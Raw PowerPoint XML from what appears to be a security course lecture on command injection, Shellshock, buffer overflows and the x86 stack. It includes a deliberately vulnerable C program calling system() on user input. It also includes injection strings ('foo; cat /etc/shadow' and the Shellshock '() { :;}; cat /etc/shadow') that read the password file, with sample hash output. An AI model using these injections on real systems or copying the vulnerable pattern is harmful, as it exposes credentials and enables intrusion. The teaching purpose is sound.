            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user can control the string passed to these functions, it can inject additional commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14183633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77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77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77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77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779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Simple Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</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char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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snprintf(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 1024, "cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var/log/%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  cmd[1023] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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prog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "foo; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log/foo: file not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>root:$1$LtWqGee9$jLrc8CWVMx6oAA8WKzS5Z1:16661:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:*:16652:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1414099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 Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On September 2014, a new bug in how bash processes its environment variable was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bash program can pass its environment to other instances of bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to variables a bash instance can pass to another instance one or more function definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is accomplished by setting environment variables whose value start with ‘()’ followed by a function definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function definition is the executed by the interpreter to create the function  	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57107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Real Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By appending commands to the function definition, it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: If a user has access to a limited-access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account he/she can break out of the restricted shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a command that is not the allowed one is requested, the original command is put in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$SSH_ORIGINAL_COMMAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By passing as a command the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() { :;}; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The command will be put in the environment variable and interpreted, resulting in the injected command executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, CGI web applications pass arguments through environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can execute arbitrary code through a web request!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998653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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows/Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The lack of boundary checking is one of the most common mistakes in C/C++ applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows are one of the most popular type of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture/OS version dependant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exploited both locally and remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can modify both the data and the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recent tools have made the process of exploiting overflows easier if not completely automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much research has been devoted to finding vulnerabilities, designing prevention techniques, and developing detection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of these mechanisms have found their way to mainstream operating system (non-executable stack, layout randomization)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85126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3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31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31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31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315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315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3315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331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Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack is essentially scratch memory for functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in MIPS, ARM, x86, and x86-64 processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starts at high memory addresses and grows down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions are free to push registers or values onto the stack, or pop values from the stack into registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The assembly language supports this on x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> holds the address of the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> decrements the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) then stores the value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the location pointed to by the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores the value at the location pointed to by the stack pointer into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then increments the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1186733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Example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Garbage</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="276685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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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27318" y="260504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67369" y="5074404"/>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839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="1778558"/>
            <a:ext cx="230968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850512" y="3194048"/>
            <a:ext cx="230968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1850512" y="3597008"/>
            <a:ext cx="230968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6245411" y="187125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633045" y="5147061"/>
            <a:ext cx="1320800"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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2469999" y="5140434"/>
            <a:ext cx="1320800"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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633045" y="5515108"/>
            <a:ext cx="1320800"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a:off x="2469999" y="5521871"/>
            <a:ext cx="1320800"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647397" y="5883155"/>
            <a:ext cx="1320800"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2469999" y="5883155"/>
            <a:ext cx="1320800"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217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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>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3" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="22"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Example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Garbage</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="276685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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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27318" y="260504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67369" y="5074404"/>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839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
